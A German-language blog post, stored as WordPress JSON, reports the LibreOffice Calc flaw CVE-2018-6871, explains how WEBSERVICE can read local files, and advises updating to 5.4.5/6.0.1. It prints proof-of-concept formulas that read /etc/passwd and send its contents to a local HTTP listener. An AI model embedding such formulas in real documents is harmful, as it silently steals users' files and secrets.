{"id":200784,"date":"2018-02-10T11:01:50","date_gmt":"2018-02-10T10:01:50","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=200784"},"modified":"2022-02-20T20:17:45","modified_gmt":"2022-02-20T19:17:45","slug":"remote-file-sicherheitslcke-cve-2018-6871-in-libreoffice","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2018\/02\/10\/remote-file-sicherheitslcke-cve-2018-6871-in-libreoffice\/","title":{"rendered":"Remote File-Sicherheitsl&uuml;cke CVE-2018-6871 in LibreOffice"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" height=\"47\"\/>Nun hat es auch LibreOffice erwischt. Denn in LibreOffice kann man nun mit pr\u00e4parierten Tabellendokumenten mal eben so im Hintergrund Dateien ins Internet verschicken. Diese Remote Arbitrary File Disclosure-Sicherheitsl\u00fccke (CVE-2018-68719 wurde in LibreOffice 5.4.5\/6.0.1 geschlossen.<\/p>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" src=\"https:\/\/ssl-vg03.met.vgwort.de\/na\/89dc5d9b6dc84be1845ea29712aa0ceb\" width=\"1\" height=\"1\"\/>Gerade wurde das B\u00fcro-Software-Paket LibreOffice 6.0 freigegeben. Quasi die Alternative zu Microsoft Office, die dazu auch noch kostenlos ist und auf verschiedenen Betriebssystemplattformen (Linux, macOS und Windows) l\u00e4uft. Die Software wird schrittweise mit diversen Features aufger\u00fcstet \u2013 Sicherheitsl\u00fccken inbegriffen. Blog-Leser Ralf H. hat mich die Nacht per Mail auf das Thema aufmerksam gemacht (danke daf\u00fcr). Es gibt inzwischen auch Posts bei Hacker News, auf <a href=\"http:\/\/seclists.org\/fulldisclosure\/2018\/Feb\/32\" target=\"_blank\" rel=\"noopener\">securelist.org<\/a> und auf <a href=\"https:\/\/www.reddit.com\/r\/netsec\/comments\/7wgii0\/libreoffice_remote_arbitrary_file_disclosure\/\" target=\"_blank\" rel=\"noopener\">reddit.com<\/a>.<\/p>\n<h2>Remote Arbitrary File Disclosure (CVE-2018-6871)<\/h2>\n<p>LibreOffice unterst\u00fctzt die Funktion COM.MICROSOFT.WEBSERVICE aus Microsoft Office. Eine Beschreibung der Funktion, die in Microsoft Excel 2013 und 2016 verf\u00fcgbar ist, findet sich auf <a href=\"https:\/\/support.office.com\/en-us\/article\/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\" target=\"_blank\" rel=\"noopener\">dieser Microsoft Seite<\/a>. Zweck der Funktion in Excel ist es,&nbsp; Daten von einem Webservice im Internet oder Intranet zu holen. Dazu braucht der Funktion nur die URL der Ressource aus dem Internet\/Intranet als Parameter \u00fcbergeben zu werden. <\/p>\n<p>=WEBSERVICE(\"http:\/\/mywebservice.com\/serviceEndpoint?searchString=Excel\") <\/p>\n<p>Hier ist ein Beispiel f\u00fcr einen Aufruf: <\/p>\n<pre><code>=FILTERXML(WEBSERVICE(\"http:\/\/api.openweathermap.org\/data\/2.5\/forecast?q=Copenhagen,dk&amp;mode=xml&amp;units=metric\");\"number(\/weatherdata\/forecast\/time[2]\/temperature\/@value)\")<\/code><\/pre>\n<p>Bei Microsoft findet sich in der Funktionsbeschreibung allerdings eine gewichtige Einschr\u00e4nkung:<\/p>\n<blockquote>\n<p>For protocols that are not supported, such as ftp: \/\/ or file: \/\/, WEBSERVICE returns the #VALUE! error value.<\/p>\n<\/blockquote>\n<p>Es lassen sich also keine Dateien per ftp oder file-Protokoll \u00fcber diese Funktion implementieren. In LibreOffice wurden diese Restriktionen vor den Versionen 5.4.5\/6.0.1 leider nicht implementiert.<\/p>\n<p>Standardm\u00e4\u00dfig werden die Zellen in LibreOffice Calc nicht aktualisiert. Sofern Sie aber einen Zelltyp wie <em>~error<\/em> angeben, wird die Zelle beim \u00d6ffnen des Dokuments aktualisiert. Dies erm\u00f6glicht es, Dateien \u00fcber diese Schwachstelle zu versenden, sie @jollheef (Mikhail Klementev) von seccomp.ru auf <a href=\"https:\/\/github.com\/jollheef\/libreoffice-remote-arbitrary-file-disclosure\" target=\"_blank\" rel=\"noopener\">GitHub erl\u00e4utert<\/a>. Um eine Datei lokal zu lesen, lie\u00dfe sich in LibreOffice Calc folgende Anweisung verwenden:<\/p>\n<pre>=WEBSERVICE(\"\/etc\/passwd\")<\/pre>\n<p>Dann reicht die nachfolgende Anweisung, um die betreffende Datei zu lesen und dann zu versenden:<\/p>\n<pre><code>=WEBSERVICE(\"http:\/\/localhost:6000\/?q=\" &amp; WEBSERVICE(\"\/etc\/passwd\"))<\/code><\/pre>\n<p>In anderen LibreOffice-Modulen lie\u00dfe sich eine Calc-Tabelle einbetten. Dann erm\u00f6glicht die Sicherheitsl\u00fccke CVE-2018-6871 beliebige Dateien im Zugriff des Benutzers zu lesen und ins Internet zu versenden. <\/p>\n<p>Es ist also relativ einfach, beliebige Dateien mit Schl\u00fcsseln, Passw\u00f6rtern und allem anderen zu versenden. Die Erfolgsquote liegt bei 100%, und das Ganze erfolgt f\u00fcr den Nutzer unsichtbar im Hintergrund \u2013 er bekommt davon nichts mit. Alles, was es braucht, ist eine pr\u00e4parierte Datei mit der manipulierten Calc-Tabelle. Der Exploit bzw. das Proof of Concept von @jollheef funktioniert in allen LibreOffice Versionen vor 5.4.5\/6.0.1 und dazu in allen Betriebssystemen (GNU\/Linux, MS Windows, MacOS etc.). Die manipulierte Calc-Tabelle kann in fast alle von LO unterst\u00fctzten Formate eingebettet werden. <\/p>\n<h2>Fehler bei LibreOffice bekannt und gefixt<\/h2>\n<p>Der Fehler ist den LibreOffice-Entwicklern bekannt. Er wurde gestern auf <a href=\"https:\/\/www.libreoffice.org\/about-us\/security\/advisories\/cve-2018-1055\/\" target=\"_blank\" rel=\"noopener\">dieser LibreOffice-Seite<\/a> ver\u00f6ffentlicht. In den LibreOffice Versionen 5.4.5\/6.0.1 ist das Problem behoben. Dort wurde die Funktion WEBSERVICE nun darauf beschr\u00e4nkt, auf http- und https-URLs zuzugreifen und WEBSERVICE-URLs unter die Linkmanagement-Infrastruktur von LibreOffice Calc zu stellen. Es bleibt also nur, so schnell als m\u00f6glich auf die LibreOffice Versionen 5.4.5\/6.0.1 und h\u00f6her umzusteigen.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nun hat es auch LibreOffice erwischt. Denn in LibreOffice kann man nun mit pr\u00e4parierten Tabellendokumenten mal eben so im Hintergrund Dateien ins Internet verschicken. Diese Remote Arbitrary File Disclosure-Sicherheitsl\u00fccke (CVE-2018-68719 wurde in LibreOffice 5.4.5\/6.0.1 geschlossen.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[270,426],"tags":[6825,272,4328],"class_list":["post-200784","post","type-post","status-publish","format-standard","hentry","category-office","category-sicherheit","tag-cve-2018-6871","tag-libreoffice","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/200784","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=200784"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/200784\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=200784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=200784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=200784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}